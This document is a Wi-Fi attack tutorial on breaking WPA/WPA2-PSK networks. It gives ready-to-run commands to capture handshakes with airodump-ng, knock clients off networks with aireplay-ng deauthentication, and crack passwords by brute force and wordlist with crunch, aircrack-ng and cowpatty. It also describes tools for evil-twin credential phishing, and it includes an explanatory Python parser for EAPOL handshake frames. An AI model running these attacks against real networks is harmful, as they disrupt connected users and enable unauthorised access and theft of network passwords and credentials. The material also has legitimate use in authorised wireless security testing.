WPA/WPA2 - PSK
Handshake Capture
Intro & Concept
One way to attack WPA/WPA2 Wi-Fi networks is to capture the 4-way handshake, either by forcing a client to re-authenticate or by passively waiting for one to occur.
To capture it you need the AP's ESSID or BSSID and the channel it operates on, so that airodump-ng only captures/listens to packets around that specific router.
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
Now you have two options: wait for a client to connect to the AP you are trying to break into, or launch an active attack. I always prefer the second option. You need to perform a de-authentication attack to "deauthenticate" a specific client, or just de-auth all clients.
aireplay-ng -0 0 -e 'AP_name' -c 'FF:FF:FF:FF:FF:FF' wlan0mon #Send de-auth packets to the broadcast address, de-auth all clients
aireplay-ng -0 0 -e 'AP_name' -c '8d:02:03:2d:cf:ws' wlan0mon #De-auth a specific client
WPA Cracking
Now check that the handshake is present in the capture file.
aircrack-ng
aircrack-ng psk-01.cap
Crunch
Try all upper- and lower-case letters together with all digits, at a length of 8 characters:
crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - <Capture> -e <essid>
Try all possible number combinations:
crunch 8 8 1234567890 | aircrack-ng -w - <Capture> -e <essid>
tshark
tshark -r psk-01.cap -n -Y eapol #Filter the handshake (EAPOL) messages; you should see all 4 of them
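What aircrack-ng and the tshark filter above are looking for, as an added example (not code from the original page or from the aircrack-ng project): a parser for the EAPOL-Key frames of the 4-way handshake that classifies each frame as message 1 to 4 from its Key Information flags and checks that the four belong to one exchange (replay counters n, n, n+1, n+1 and the same ANonce in M1 and M3). The four frames are constructed inline; the field offsets follow the IEEE 802.11 EAPOL-Key layout.

```python
import struct

# Key Information flag bits of an EAPOL-Key frame (IEEE 802.11 RSN descriptor)
KEY_INSTALL, KEY_ACK, KEY_MIC, KEY_SECURE = 1 << 6, 1 << 7, 1 << 8, 1 << 9
# Handshake message number from the (ack, mic, install, secure) flag pattern:
# M1 ack only, M2 mic only, M3 all four set, M4 mic+secure.
MESSAGE_OF = {(1, 0, 0, 0): 1, (0, 1, 0, 0): 2, (1, 1, 1, 1): 3, (0, 1, 0, 1): 4}

def parse_eapol_key(frame: bytes) -> dict:
    """Parse one EAPOL-Key frame (what 'tshark -Y eapol' lists). Body layout:
    desc(1) key info(2) key len(2) replay(8) nonce(32) IV(16) RSC(8) key ID(8)
    MIC(16) key data len(2) key data."""
    _ver, ptype, length = struct.unpack_from("!BBH", frame, 0)
    if ptype != 3:
        raise ValueError("not an EAPOL-Key frame")
    body = frame[4:4 + length]
    key_info = struct.unpack_from("!H", body, 1)[0]
    flags = tuple(int(bool(key_info & b)) for b in (KEY_ACK, KEY_MIC, KEY_INSTALL, KEY_SECURE))
    return {"msg": MESSAGE_OF.get(flags, 0),  # 0 = unknown or malformed
            "replay": int.from_bytes(body[5:13], "big"),
            "nonce": body[13:45], "mic": body[77:93]}

def handshake_complete(frames) -> bool:
    """True when frames hold M1..M4 of one exchange: replay counters n, n, n+1,
    n+1 and the same ANonce in M1 and M3; missing or mismatched gives False."""
    seen = {}
    for k in map(parse_eapol_key, frames):
        seen.setdefault(k["msg"], k)  # keep the first copy of each message
    if any(m not in seen for m in (1, 2, 3, 4)):
        return False
    n = seen[1]["replay"]
    return (seen[2]["replay"] == n and seen[3]["replay"] == n + 1
            and seen[4]["replay"] == n + 1 and seen[1]["nonce"] == seen[3]["nonce"])

def build_eapol_key(key_info: int, replay: int, nonce: bytes, mic: bytes) -> bytes:
    """Build a constructed sample frame (key length 16, empty key data)."""
    body = (struct.pack("!BHH", 2, key_info, 16) + replay.to_bytes(8, "big")
            + nonce + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack("!H", 0))
    return struct.pack("!BBH", 2, 3, len(body)) + body

# Constructed sample handshake; the key info values are the usual ones for CCMP
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
SAMPLE = [build_eapol_key(0x008A, 1, ANONCE, bytes(16)),        # M1  AP -> STA
          build_eapol_key(0x010A, 1, SNONCE, b"\x11" * 16),     # M2  STA -> AP
          build_eapol_key(0x13CA, 2, ANONCE, b"\x22" * 16),     # M3  AP -> STA
          build_eapol_key(0x030A, 2, bytes(32), b"\x33" * 16)]  # M4  STA -> AP
```

A capture with only M1 and M2, or with M3/M4 from a different exchange (wrong replay counter), fails the check, which is why aircrack-ng sometimes reports a file as having no usable handshake even though EAPOL frames are present.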
cowpatty
cowpatty -r psk-01.cap -s "ESSID" -f -
Now continue to crack:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
Resources
Wifite
This tool picks the closest AP and starts attacking it with a single command. The attacks it automates are:
WEP (Launches WEP attacks)
WPA/WPA2 - PSK
The Capture of the WPA Handshake
PMKID attacks (remember, for this to succeed the AP needs to have roaming mode enabled)
WPS
Pixie dust attack and the brute force attack (this can take a long time, so keep that in mind)
If a PMKID or handshake is obtained, the tool tries to crack it with a top-5000-passwords wordlist.
Wifiphisher
Performs Evil Twin attacks to obtain the AP's password, or to capture credentials from nearby people who connect to your malicious AP.
wificraK
This is my own Wi-Fi hacking tool that I created; it automates the process of WPA handshake capture. Easy to use.